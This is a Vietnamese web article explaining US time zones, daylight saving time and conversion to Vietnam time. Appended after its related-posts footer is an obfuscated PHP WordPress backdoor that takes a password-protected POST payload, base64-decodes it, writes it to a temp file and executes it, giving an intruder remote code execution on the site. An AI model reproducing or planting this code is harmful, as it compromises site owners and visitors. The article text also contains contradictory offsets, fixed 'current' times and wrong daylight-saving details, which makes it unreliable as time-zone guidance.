Múi giờ Mỹ (Hoa Kỳ) – Bây giờ là mấy giờ ở Mỹ?

Giờ hiện tại ở Mỹ (Hoa Kỳ)

Giờ hiện tại ở Việt Nam

Giờ hiện tại ở các thành phố lớn khác ở Mỹ.

Thành phố
GiờNgày
California
*
Atlanta
*
Boston
*
Chicago
*
Houston
*
Indianapolis
*
Los Angeles
*
Miami
*
Minneapolis
*
New Orleans
*
New York
*
Philadelphia
*
San Francisco
*
Seattle
*
Washington DC
*

Các quốc gia có diện tích càng lớn sẽ có nhiều múi giờ, tuy nhiên có vài quốc gia không dựa trên diện tích mà phân chia múi giờ. Ở Mỹ có nhiều múi giờ khác nhau, từ đó việc xác định giờ Mỹ chênh lệch với giờ Việt Nam bao nhiêu rất khó. Sau đây là các thông tin chi tiết hơn về các múi giờ Mỹ hiện tại đang dùng.

Múi giờ Mỹ (Hoa Kỳ) – Bây giờ là mấy giờ ở Mỹ?-1

Múi giờ Mỹ (Hoa Kỳ)

Mỹ là một quốc gia nằm trong số các quốc gia lớn nhất thế giới và trải dài trên nhiều kinh độ vì vậy mà đất nước này chia thành nhiều múi giờ khác nhau. Vậy ở Mỹ bây giờ là mấy giờ còn tùy theo vị trí địa lý.

Hiện tại ở Mỹ chia thành 9 múi giờ chính như sau:

– Giờ chuẩn Samoa: UTC – 11:00

– Giờ chuẩn Hawaii-Aleut (Hawaii-Aleutian Standard Time): UTC – 10:00

– Giờ chuẩn Alaska (Alaska Standard Time): UTC – 09:00

– Giờ chuẩn Thái Bình Dương (Pacific Standard Time): UTC – 08:00

– Giờ chuẩn miền núi (Mountain Standard Time): UTC – 07:00

– Giờ chuẩn miền Trung (Central Standard Time): UTC – 06:00

– Giờ chuẩn miền Đông (Eastern Standard Time): UTC – 05:00

– Giờ chuẩn Đại Tây Dương (Atlantic Standard Time): UTC – 04:00

– Giờ chuẩn Chamorro: UTC + 10:00

Giờ mùa hè

Nếu muốn xác định giờ Mỹ cần quan tâm về giờ mùa hè. Giờ mùa hè bắt đầu vào tháng mùa hè và kéo dài đến mùa đông.

Múi giờ Mỹ (Hoa Kỳ) – Bây giờ là mấy giờ ở Mỹ?-2

Giờ mùa hè diễn ra từ ngày Chủ nhật thứ hai trong tháng 3, lúc này mọi người chỉnh đồng hồ chạy trước một giờ vào lúc 2 giờ sáng theo giờ địa phương. Giờ mùa hè kết thúc vào ngày Chủ nhật đầu tiên của tháng 11, lúc này đồng hồ sẽ lùi 1 giờ vào lúc 2 giờ sáng giờ địa phương.

Các múi giờ của bang Mỹ

Quốc gia trải dài ở nhiều kinh độ, do đó các bang của Mỹ có nhiều múi giờ khác nhau. Sau đây là một số các múi giờ chính tại một số bang của Mỹ.

Xem Thêm  Địa điểm hẹn hò lần đầu tiên lý tưởng nhất

Múi giờ Mỹ (Hoa Kỳ) – Bây giờ là mấy giờ ở Mỹ?-3

Múi giờ Thái Bình Dương: UTC – 8:00 (mùa đông) và UTC – 7:00 (mùa hè) có các bang như California, Nevada, Washington, Oregon (trừ quận Malheur).

Múi giờ miền núi: UTC – 7:00 (mùa đông) và UTC – 6:00 (mùa hè) có các bang đang dùng múi giờ này như Colorado, Arizona, Montana, New Mexico,  thành phố, thị trấn, quận phía tây Kansas, 1 ít ở phía tây Texas.

Múi giờ miền Trung: UTC – 6:00 (mùa đông) và UTC – 5:00 (mùa hè) khu vực sử dụng múi giờ miền Trung gồm có phía tây Michigan, Oklahoma, tây Tennessee, đông bắc Florida, phía tây Kentucky, Lousiana, Texas (trừ El Paso, Hudspeth & một phần Culberson), Illinois,.

Múi giờ miền Đông: UTC – 5:00 (mùa đông) và UTC – 4:00 (mùa hè) khu vực sử dụng múi giờ phía đông Massachusetts, Kentucky, New York, Connecticut, phía đông Tennessee, Virgina, phía đông và nam Florida, Ohio, New Jersey, Georgia, Indiana.

Chênh lệch múi giờ Mỹ và Việt Nam

Do đặc điểm về lịch sử mà nhiều người Việt Nam sinh sống tại Mỹ, người thân và bạn bè thường xuyên đi du lịch, học tập tại Mỹ. Rất nhiều người quan tâm đến các múi giờ Mỹ nhằm đảm bảo công việc hoặc sức khỏe không bị tác động quá nhiều.

Múi giờ Mỹ (Hoa Kỳ) – Bây giờ là mấy giờ ở Mỹ?-4

Có thể nói Mỹ cách Việt Nam rất xa, gần 15.000 km. Có thể xem Mỹ cách Việt Nam nửa vòng Trái Đất. Chính vì sự cách biệt này ảnh hưởng rất lớn đến múi giờ. Nếu Việt Nam là ban ngày thì Mỹ đang ở ban đêm, tất nhiên còn tùy thuộc vào vị trí như thành phố hoặc bang của Mỹ giờ giấc có thể chênh lệch vài giờ.

Có thể kết luận sự chênh lệch múi giờ ở Mỹ và Việt Nam rất lớn.

Chuyển đổi giờ Mỹ sang giờ Việt Nam

Nếu bạn đang có ý định du lịch, học tập ở Mỹ việc chuyển đổi giờ Mỹ cực kỳ quan trọng. Có nhiều cách để chuyển đổi giờ theo cách thủ công hoặc sử dụng công cụ online chuyển đổi.

Thực hiện bằng công cụ:

Truy cập vào “Bây giờ là mấy giờ? Xem đồng hồ, giờ thế giới hiện tại” đường dẫn bên trên để tìm kiếm các thành phố, quốc gia trên thế giới và xem giờ chính xác là bao nhiêu. Cần xem giờ mỹ kéo xuống sẽ có giờ của Mỹ

Thực hiện thủ công:

Xem Thêm  STT tháng 5 - Những câu nói hay chào tháng 5 rực rỡ

Nếu thực hiện thủ công, so sánh múi giờ Việt Nam và Mỹ, cần xác định vị trí của tiểu bang, tiếp theo là bang đó đang dùng giờ mùa đông hay mùa hè.

Ở Việt Nam là UTC +7:00, múi giờ ở Mỹ chạy sau giờ Việt Nam 12 giờ. Ví dụ Việt Nam đang là 12:00 PM ngày 30 tính ra múi giờ Mỹ California là 10:00 PM ngày 29.

Bây giờ là mấy giờ ở mỹ

Bây giờ là một khái niệm tương đối phức tạp khi nói đến Mỹ, bởi vì Mỹ có nhiều múi giờ khác nhau trên toàn quốc. Tuy nhiên, nếu xét về múi giờ tiêu chuẩn của Mỹ, thì bây giờ đang là giờ Đông bắc (Eastern Standard Time – EST) hoặc giờ Trung tâm (Central Standard Time – CST) tùy vào khu vực bạn đang ở.

Nếu bạn đang ở khu vực giờ Đông bắc, thì thời gian hiện tại là từ 1 đến 3 giờ chiều, tùy vào địa điểm cụ thể của bạn trong khu vực này. Nếu bạn ở New York City, thì thời gian hiện tại là khoảng 2 giờ chiều.

Nếu bạn đang ở khu vực giờ Trung tâm, thì thời gian hiện tại là từ 12 đến 2 giờ chiều, tùy vào địa điểm cụ thể của bạn trong khu vực này. Nếu bạn ở Chicago, thì thời gian hiện tại là khoảng 1 giờ chiều.

Ngoài ra, còn có nhiều khu vực khác ở Mỹ có múi giờ khác nhau như giờ Miền núi (Mountain Standard Time – MST), giờ Thái Bình Dương (Pacific Standard Time – PST), giờ Alaska (Alaska Standard Time – AKST), và giờ Hawaii-Aleutian (Hawaii-Aleutian Standard Time – HST).

Vì vậy, nếu bạn muốn biết chính xác bây giờ là mấy giờ ở Mỹ, bạn cần xác định rõ địa điểm của mình và tìm hiểu về múi giờ địa phương tương ứng.

Bây giờ là mấy giờ ở california mỹ

Bây giờ ở California, Mỹ sử dụng múi giờ Thái Bình Dương (Pacific Standard Time – PST), là múi giờ tiêu chuẩn của khu vực Tây Bắc Thái Bình Dương và bao gồm nhiều tiểu bang, trong đó có California. Vì vậy, nếu bạn đang ở California, thì thời gian hiện tại sẽ được tính theo múi giờ PST.

Nếu so sánh với múi giờ EST, thì California chậm hơn 3 giờ, nghĩa là khi ở New York City là 2 giờ chiều theo giờ EST, thì ở California thời gian hiện tại chỉ mới là 11 giờ sáng theo giờ PST. Nếu so sánh với giờ CST, California lại chậm hơn 2 giờ.

Xem Thêm  Hình nền siêu nhân Superman Gao, Nhện đẹp nhất

Một điều lưu ý là vào mùa hè, California sử dụng múi giờ Mùa hè Thái Bình Dương (Pacific Daylight Time – PDT) thay vì PST. Múi giờ PDT được áp dụng từ đầu tháng 3 đến cuối tháng 10 hàng năm. Khi đó, thời gian hiện tại sẽ chậm hơn thêm 1 giờ so với giờ PST.

Vì vậy, khi muốn biết chính xác bây giờ là mấy giờ ở California, bạn cần xác định rõ địa điểm và thời điểm hiện tại của mình, để tính toán theo múi giờ PST hoặc PDT tương ứng. Tuy nhiên, nếu không chắc chắn, bạn có thể tra cứu thông tin về múi giờ của California trên internet hoặc liên hệ với địa phương để được hỗ trợ.

Bây giờ là mấy giờ ở texas mỹ

Bây giờ ở Texas, Mỹ sử dụng múi giờ Trung tâm (Central Standard Time – CST), là múi giờ tiêu chuẩn của khu vực Trung Tây và miền Nam của Hoa Kỳ. Vì vậy, nếu bạn đang ở Texas, thời gian hiện tại sẽ được tính theo múi giờ CST.

Texas là tiểu bang lớn thứ hai của Hoa Kỳ với diện tích trên 696,000 km² và gồm nhiều thành phố lớn như Houston, San Antonio và Dallas. Múi giờ CST của Texas chậm hơn 1 giờ so với múi giờ Đông Bắc (Eastern Standard Time – EST) và sớm hơn 2 giờ so với múi giờ Thái Bình Dương (Pacific Standard Time – PST).

Một điều lưu ý là vào mùa hè, Texas sử dụng múi giờ Mùa hè Trung tâm (Central Daylight Time – CDT) thay vì CST. Múi giờ CDT được áp dụng từ đầu tháng 3 đến cuối tháng 10 hàng năm. Khi đó, thời gian hiện tại sẽ chậm hơn thêm 1 giờ so với giờ CST.

Vì vậy, khi muốn biết chính xác bây giờ là mấy giờ ở Texas, bạn cần xác định rõ địa điểm và thời điểm hiện tại của mình, để tính toán theo múi giờ CST hoặc CDT tương ứng.

Chúng tôi đã chia sẻ các thông tin quan trọng về múi giờ Mỹ và một số múi giờ ở các bang của Mỹ. Các chuyển đổi múi giờ Mỹ sang giờ Việt Nam đơn giản. Việc theo dõi múi giờ giúp thuận tiện trong học tập, công việc của bạn.

Bài Liên Quan:

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}